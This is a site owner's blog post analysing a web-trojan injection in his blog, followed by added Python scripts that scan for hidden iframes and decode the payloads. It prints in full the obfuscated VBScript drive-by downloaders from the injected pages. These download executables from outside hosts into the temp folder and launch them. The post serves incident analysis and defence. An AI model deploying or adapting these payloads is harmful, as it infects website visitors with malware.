
My independently hosted blog [www.suconsulting.com/blog] had a web trojan planted in it by some despicable lowlife a few days ago. It has now been restored to a clean state [I deleted every file except the database and re-uploaded the original files]. I am reporting the situation below in the hope that an expert can help decode the last part, the final source code, and drag the trojan-planter out into the open. If the origin can be established I will report it to the relevant authorities (I have kept the trojan pages), and this will also serve as a documented case of cybercrime.
Special warning: the URLs mentioned below all carry trojans. Visit them only if you understand what that means and have protective measures in place; otherwise I accept no responsibility for any damage you suffer.
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
It probably had not been there long, because it was only in the last two days, while browsing my own blog [www.suconsulting.com/blog], that I noticed the status bar of my Maxthon browser flashing rapidly through a whole string of URLs. At first I thought my PC had a rogue plugin; after several scans with cleanup tools turned up nothing, it suddenly occurred to me that the trojan was embedded in my own pages.
------I also have a serious complaint about the virtual hosting provider for this site [福建中资源 www.zzy.cn]: the pages were plastered with trojans and the provider showed no reaction at all, and it offers no trojan or malware monitoring. Are site owners really expected to look after site security themselves around the clock? Ridiculous!
One look made me sick and furious: this despicable trojan-planter had hung his trojan on almost every page of my site, including every page of the Christian devotional Streams in the Desert (荒漠甘泉) HTML pages. This lowlife is not only despicable but unusually disgusting. Today I simply spent some time making screenshots, so that people who have no website or have never built a web page can see what these lowlifes do, and to leave a sample of the cybercrime of web-page trojan injection.
Level 1: page analysis
Figure 1: Disgusting, isn't it? This creep embedded his trojan page six times in the same page! How can a hooligan be this relentless?
[Note: the index page of the directory at the IFRAME address http:/ww.haogs.cn/html is the page that carries the trojan]
Figure 2: At the end of almost every page he embedded his trojan frame page [in an IFRAME tag].
Figure 3: This haogs site is not necessarily the creep's own; more likely it was broken into by him and used as a zombie host for the trojan page, and the address of the trojan-carrying page on haogs was then hung on other sites.
Figure 4: My blog installation has only 203 files in total, yet it was injected in 178 places. The creep must have downloaded all the files and added the code in one pass with Dreamweaver (DW). Adding that many is shamelessly brazen.
Figure 5: Besides the URL above, this URL is also a point of injection.
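A site owner in the situation of Figure 4 (178 injections across 203 files) needs a way to find every injected tag, before cleanup and again after the originals are re-uploaded, rather than opening files one at a time. The following Python script is an added example, not part of the original post or of the LBS blog software: it walks a downloaded copy of the site and reports every iframe sized to be invisible and every script loaded from a host other than the site's own. The sample page, the OWN_HOSTS list and the function names are assumptions made for this example; the sample reuses the defanged URLs quoted in this post.

```python
import os
import re
from html.parser import HTMLParser

# Constructed sample page (not a file from the compromised site): one legitimate
# visible iframe, one zero-size iframe and one off-site counter script. The URLs
# are defanged the same way as in the post ("http:/ww.", "htt/").
SAMPLE_HTML = """<html><body>
<p>Streams in the Desert, day 12</p>
<iframe src="/blog/calendar.htm" width=400 height=300></iframe>
<iframe src="http:/ww.haogs.cn/html/" width=0 height=0></iframe>
<script language="javascript" src="htt/count9.51yes.com/click.aspx?id=95169479&logo=1"></script>
<script>var visitors = 1;</script>
</body></html>
"""

# Hosts that may legitimately serve scripts to this site (assumption for the example).
OWN_HOSTS = {"www.suconsulting.com", "suconsulting.com"}

# A dotted host name that is followed by "/" or ":" (so "app.js" at the end of a
# path is not mistaken for a host). Matches even when the scheme is mangled.
_HOST_IN_URL = re.compile(r"(?:^|/)((?:[\w-]+\.)+[a-z]{2,})(?=[/:])", re.I)


def _dim(value):
    """'0', '0px', '1' -> int; anything else (missing, '100%') -> None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _is_hidden(attrs):
    """Iframe is effectively invisible: width or height <= 1, or hidden by style."""
    w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((w is not None and w <= 1) or (h is not None and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def _offsite(src):
    """Script src names a host that is not one of ours."""
    m = _HOST_IN_URL.search(src)
    return bool(m) and m.group(1).lower() not in OWN_HOSTS


class InjectFinder(HTMLParser):
    """Collects (kind, src, line) for hidden iframes and off-site script includes."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "iframe" and _is_hidden(a):
            self.hits.append(("hidden-iframe", a.get("src", ""), line))
        elif tag == "script" and a.get("src") and _offsite(a["src"]):
            self.hits.append(("offsite-script", a["src"], line))


def scan_text(html):
    p = InjectFinder()
    p.feed(html)
    p.close()
    return p.hits


def scan_tree(root, exts=(".htm", ".html", ".php", ".asp", ".js")):
    """Walk a site export; return {path: hits} for every file with at least one hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = scan_text(f.read())
                if hits:
                    report[path] = hits
    return report


def demo_tree():
    """Write the sample beside a clean page in a temp dir and scan the tree."""
    import tempfile
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "day12.html"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_HTML)
    with open(os.path.join(root, "clean.html"), "w", encoding="utf-8") as f:
        f.write("<html><body><p>nothing injected</p></body></html>\n")
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo_tree().items():
        for kind, src, line in hits:
            print(f"{path}:{line}: {kind} {src}")
```

Run it against the FTP download of the site before cleanup to get the per-file list (that is where the 178 figure comes from) and again on the freshly uploaded originals, which should produce no output. A visible, correctly sized iframe such as the calendar embed in the sample is deliberately not reported, and the site's own script includes are exempted through OWN_HOSTS.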
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
Level 2: tracing the surface source
Information found for the haogs page:
QQ number found from the e-mail address above:
Address and telephone number found from the e-mail address above:
The injector also uses a visitor-counter script:
Level 3: tracing the ultimate source
As I said above, the level-2 source is only the surface source. The haogs site itself may have been broken into, and likewise ww.cg100.com (warning: do not visit unless for technical or crime research) may have had the trojan hung on it by an intruder without its owner knowing.
The real trojan code has to be found by analysing the source of the pages that get embedded. There are two places: the index page of the haogs.cn/html folder, and the page ww.cg100.com/knowledge/ma.htm.
Download them with a download tool and open them in Notepad.
1. The source of ma.htm is as follows. The VBScript is stored as one long hexadecimal string; the DO WHILE loop at the bottom takes two hex digits at a time, converts each pair back into a character, appends it to D, and finally runs the result with EXECUTE, which is what makes the payload hard to read at a glance:
<script language="VBScript">
S="6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F616E69752E3531616E64612E636F6D2F77756C69616F2E657865220D0A666E616D65313D2277756C69616F2E657865220D0A536574206466203D20646F63756D65"
S=S+"6E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D"
S=S+"0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D2265616D220D0A73"
S=S+"7472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20737472362C2063"
S=S+"75726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A7365742046203D206466"
S=S+"2E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F70656E0D0A532E7772"
S=S+"69746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365742051203D2064"
S=S+"662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP
EXECUTE D
</script>
2. The code in the index page of the ww.haogs.cn/html folder is as follows. The first line embeds another trojan page, the second is a visitor-counter script (warning: do not visit unless for technical or crime research; to avoid accidental clicks I removed "/w" from the haogs URL and "p:/" from the URL on the line below it):
<iframe src="http:/ww.haogs.cn/mm/mm.htm" width=0 height=0></iframe>
<script language="javascript" src="htt/count9.51yes.com/click.aspx?id=95169479&logo=1"></script>
3. The source of mm.htm is as follows (judging from the second line, this creep may be trying to use the web trojan to steal QQ account numbers and send them to his mailbox. Warning: do not visit unless for technical or crime research; I removed "/w" from the qq.exe address below to avoid accidental clicks):
<script>
FanChenZi="http:/ww.haogs.cn/mm/qq.exe"
t="60,83,99,114,105,112,116,32,76,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,102,108,106,103,100,102,108,106,103,100,102,61,106,100,102,104,103,102,100,103,13,10,102,100,103,100,102,103,100,102,103,61,100,102,103,100,102,103,13,10,100,102,103,100,102,103,100,102,103,100,102,103,61,100,102,103,102,104,13,10,102,100,103,103,102,61,102,100,103,100,103,100,102,103,100,102,103,13,10,100,102,103,102,100,103,102,100,103,61,100,102,103,100,102,103,100,102,13,10,100,102,103,100,102,103,100,102,103,61,100,102,103,100,102,103,100,102,103,13,10,81,105,97,110,74,117,70,97,110,61,34,111,34,38,34,98,34,38,34,106,34,13,10,81,105,97,110,74,117,67,104,101,110,61,34,101,34,38,34,99,34,38,34,116,34,13,10,81,105,97,110,74,117,70,97,110,99,104,101,110,61,81,105,97,110,74,117,70,97,110,38,81,105,97,110,74,117,67,104,101,110,13,10,81,105,97,110,70,97,110,61,34,99,34,38,34,108,34,13,10,81,105,97,110,67,104,101,110,61,34,97,34,38,34,115,34,38,34,115,34,13,10,81,105,97,110,90,105,61,34,105,34,38,34,100,34,13,10,81,105,97,110,70,97,110,99,104,101,110,90,105,61,81,105,97,110,70,97,110,38,81,105,97,110,67,104,101,110,38,81,105,97,110,90,105,13,10,81,105,97,110,74,117,70,61,34,99,34,38,34,108,34,38,34,115,34,13,10,81,105,97,110,74,117,70,97,61,34,105,34,38,34,100,34,38,34,58,34,13,10,81,105,97,110,70,97,110,61,34,66,34,38,34,68,34,38,34,57,34,38,34,54,67,34,38,34,53,53,34,38,34,54,34,38,34,45,34,13,10,81,105,97,110,67,101,110,61,34,54,34,38,34,53,34,38,34,65,34,38,34,51,34,38,34,45,34,38,34,49,34,38,34,49,34,38,34,68,34,38,34,48,34,13,10,81,105,97,110,67,61,34,45,57,34,38,34,56,34,38,34,51,65,34,38,34,45,34,13,10,81,105,97,110,74,117,90,61,34,48,34,38,34,48,34,38,34,67,34,38,34,48,34,38,34,52,34,13,10,81,105,97,110,74,117,105,61,34,70,34,38,34,67,34,38,34,50,34,38,34,57,34,38,34,69,34,38,34,51,34,38,34,54,34,13,10,81,105,97,110,74,117,99,104,101,110,90,105,61,81,105,97,110,74,117,70,38,81,105,97,110,74,117,70,97,38,81,105,97,110,70,97,110,38,81,105,97,110,67,101,110,38,81,105,97,110,67,38,81,105,97,110,74,117,90,38,81,105,97,110,74,117,105,13,10,81,105,97,110,70,61,34,77,34,38,34,105,34,38,34,99,34,13,10,81,105,97,110,70,97,61,34,114,34,38,34,111,34,38,34,115,34,13,10,81,105,97,110,70,110,61,34,111,34,38,34,102,34,38,34,116,34,38,34,46,34,13,10,81,105,97,110,67,110,61,34,88,34,38,34,77,34,38,34,76,34,13,10,81,105,97,110,78,61,34,72,34,38,34,84,34,13,10,81,105,97,110,90,61,34,84,34,38,34,80,34,13,10,81,105,97,110,74,117,90,105,61,81,105,97,110,70,38,81,105,97,110,70,97,38,81,105,97,110,70,110,38,81,105,97,110,67,110,38,81,105,97,110,78,38,81,105,97,110,90,13,10,81,105,70,61,34,83,34,38,34,99,34,38,34,114,34,38,34,105,34,13,10,81,105,70,97,61,34,112,34,38,34,116,105,34,38,34,110,34,38,34,103,34,38,34,46,34,13,10,81,105,70,110,61,34,70,34,38,34,105,34,38,34,108,34,38,34,101,34,38,34,83,34,13,10,81,105,67,110,61,34,121,34,38,34,115,34,38,34,116,34,38,34,101,34,13,10,81,105,78,61,34,109,34,38,34,79,34,38,34,98,34,13,10,81,105,90,61,34,106,34,38,34,101,34,38,34,99,34,38,34,116,34,13,10,81,105,90,105,61,81,105,70,38,81,105,70,97,38,81,105,67,110,38,81,105,67,110,38,81,105,78,38,81,105,90"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
Set Zi = document.createElement(QianJuFanchen)
Zi.SetAttribute QianFanchenZi, QianJuchenZi
Happy=QianJuZi
Set ZhongHua = Zi.CreateObject(Happy,"")
ZhongHua.Open "GE"&"T", FanChenZi, False
ZhongHua.Send
ChenziUser="C"&"he"&"n"&"zi.exe"
QianjuUser="C"&"he"&"n"&"zi.vbs"
Set HUA = Zi.createobject(QiZi,"")
Set Wuer = HUA.GetSpecialFolder(2)
ChenziUser=HUA.BuildPath(Wuer,ChenziUser)
QianjuUser=HUA.BuildPath(Wuer,QianjuUser)
Zhong="A"&"d"
Hua="o"&"d"
Wang="b"&"."&"s"&"t"
luo="r"&"e"&"a"&"m"
ZhongHuaWangLuo=Zhong&Hua&Wang&luo
Set Chenzi = Zi.createobject(ZhongHuaWangLuo,"")
Chenzi.type=1
Chenzi.Open
Chenzi.Write ZhongHua.ResponseBody
Chenzi.Savetofile ChenziUser,2
Chenzi.Close
Chenzi.Type=2
Chenzi.Open
Chenzi.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ChenziUser&""")"&vbCrLf&"Set Shell = Nothing"
Chenzi.Savetofile QianjuUser,2
Chenzi.Close
Xin="S"&"h"&"e"
Nian="l"&"l"&"."
Kuai="A"&"p"&"p"
Le="l"&"i"
QianJuZhuDaJiaXinNianKuaiLe=Xin&Nian&Kuai&Le
XinNianKuaiLe=QianJuZhuDaJiaXinNianKuaiLe
Set Zhong = Zi.createobject(XinNianKuaiLe&"cation","")
Zhong.ShellExecute QianjuUser,"","","Open",0
</Script>
Level 4: decoding the code
I have not worked this part out yet and hope someone who knows something about decoding can help; I would like to see who this creep really is and which company he belongs to. One additional clue: besides haogs above, another URL that flashed rapidly through the browser status bar after the injection was www.16tan.com, a despicable maker and seller of pop-up ads.
Addendum: losses
Out of sheer disgust with this creep I was irritable while reworking the program [this LBS blog program had long since been modified by me beyond recognition, and a fresh install could not even use the database]. After downloading the blog database I deleted all the site's files in one go, forgetting the images in the upload folder, and so lost every picture from two years of the [原创影像] (Original Images) column, many of which had no backup.
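Both encodings above can be undone offline without ever loading the pages in a browser. The following Python script is an added example, not part of the original post: it applies the same two transforms the pages themselves use (two hex digits to one character for ma.htm, String.fromCharCode over the comma list for mm.htm) and then folds the "a"&"b"&NAME string-splicing so that the real URLs, ProgIDs and class ID can be read directly. The hex string is copied verbatim from ma.htm above. For mm.htm, only the first four lines of the char-code list are included (the full list on the page decodes the same way), together with the splicing lines from the plain-text tail of that page; the function names are the example's own.

```python
import re

# Layer 1: the hex string from ma.htm above (the S= chunks joined, copied from the page).
MA_HTM_HEX = (
    "6F6E206572726F7220726573756D65206E6578740D0A6375726C3D22687474703A2F2F616E69752E3531616E64612E636F6D2F77756C69616F2E657865220D0A666E616D65313D2277756C69616F2E657865220D0A536574206466203D20646F63756D65"
    "6E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D"
    "0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D2265616D220D0A73"
    "7472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20737472362C2063"
    "75726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B73332B73340D0A7365742046203D206466"
    "2E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F70656E0D0A532E7772"
    "69746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A696620462E46696C6545786973747328666E616D6531293D74727565207468656E0D0A202020207365742051203D2064"
    "662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C300D0A656E642069660D0A"
)

# Layer 2: excerpt of the comma-separated char-code list `t` from mm.htm (its first
# four decoded lines; the complete list on the page is handled identically).
MM_HTM_EXCERPT = (
    "60,83,99,114,105,112,116,32,76,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,"
    "81,105,97,110,74,117,70,97,110,61,34,111,34,38,34,98,34,38,34,106,34,13,10,"
    "81,105,97,110,74,117,67,104,101,110,61,34,101,34,38,34,99,34,38,34,116,34,13,10,"
    "81,105,97,110,74,117,70,97,110,99,104,101,110,61,81,105,97,110,74,117,70,97,110,38,81,105,97,110,74,117,67,104,101,110"
)

# The string-splicing lines that appear as plain text after </script> in mm.htm.
MM_HTM_TAIL = """\
ChenziUser="C"&"he"&"n"&"zi.exe"
QianjuUser="C"&"he"&"n"&"zi.vbs"
Zhong="A"&"d"
Hua="o"&"d"
Wang="b"&"."&"s"&"t"
luo="r"&"e"&"a"&"m"
ZhongHuaWangLuo=Zhong&Hua&Wang&luo
Xin="S"&"h"&"e"
Nian="l"&"l"&"."
Kuai="A"&"p"&"p"
Le="l"&"i"
QianJuZhuDaJiaXinNianKuaiLe=Xin&Nian&Kuai&Le
XinNianKuaiLe=QianJuZhuDaJiaXinNianKuaiLe
"""


def decode_hex_vbscript(s):
    """Same transform as the DO WHILE loop in ma.htm: two hex digits -> one character."""
    return bytes.fromhex(s).decode("latin-1")


def decode_charcodes(t):
    """Same as eval("String.fromCharCode(" + t + ")") in mm.htm."""
    return "".join(chr(int(n)) for n in t.split(","))


_ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
_TOKEN = re.compile(r'"[^"]*"|[A-Za-z_]\w*')


def resolve_concats(script):
    """Fold NAME="a"&"b"&OTHER style lines (VBScript & or + concatenation) into
    their final strings. Lines that contain anything else (calls, objects) are
    skipped, as are names that depend on a value we have not seen."""
    values = {}
    for line in script.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        if re.sub(r'"[^"]*"|[A-Za-z_]\w*|[&+\s]', "", rhs):
            continue  # not a pure literal/name concatenation
        parts = []
        for tok in _TOKEN.findall(rhs):
            if tok.startswith('"'):
                parts.append(tok[1:-1])
            elif tok in values:
                parts.append(values[tok])
            else:
                break  # unknown name: leave this line unresolved
        else:
            values[name] = "".join(parts)
    return values


if __name__ == "__main__":
    stage1 = decode_hex_vbscript(MA_HTM_HEX)
    print("=== ma.htm, decoded ===")
    print(stage1)
    print("=== ma.htm, spliced strings ===")
    for name, val in resolve_concats(stage1).items():
        print(f"{name} = {val!r}")
    stage2 = decode_charcodes(MM_HTM_EXCERPT) + "\r\n" + MM_HTM_TAIL
    print("=== mm.htm (excerpt + tail), spliced strings ===")
    for name, val in resolve_concats(stage2).items():
        print(f"{name} = {val!r}")
```

Two things worth noticing in the output. First, the char-code list in mm.htm decodes to the opening `<Script Language="VBScript">` tag plus the variable definitions, so the plain VBScript that follows `</script>` in the page (from `Set Zi = document.createElement(QianJuFanchen)` down to `</Script>`) is the rest of that same script, which is why it looks like stray text. Second, both pages do the same thing: they create an `<object>` with classid BD96C556-65A3-11D0-983A-00C04FC29E36 (the RDS.DataSpace control), use it to instantiate Microsoft.XMLHTTP, Adodb.stream and Shell.Application, fetch an executable (http://aniu.51anda.com/wuliao.exe in ma.htm, qq.exe on haogs in mm.htm), write it into the folder returned by GetSpecialFolder(2) (the temp folder) and launch it; mm.htm additionally drops a Chenzi.vbs that runs the downloaded Chenzi.exe. That is the MDAC RDS.DataSpace drive-by addressed by Microsoft bulletin MS06-014, so a browser with that update applied will not run the payload.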